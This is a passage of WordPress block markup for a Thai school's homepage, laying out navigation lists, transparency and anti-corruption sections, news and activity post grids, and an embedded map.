href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html 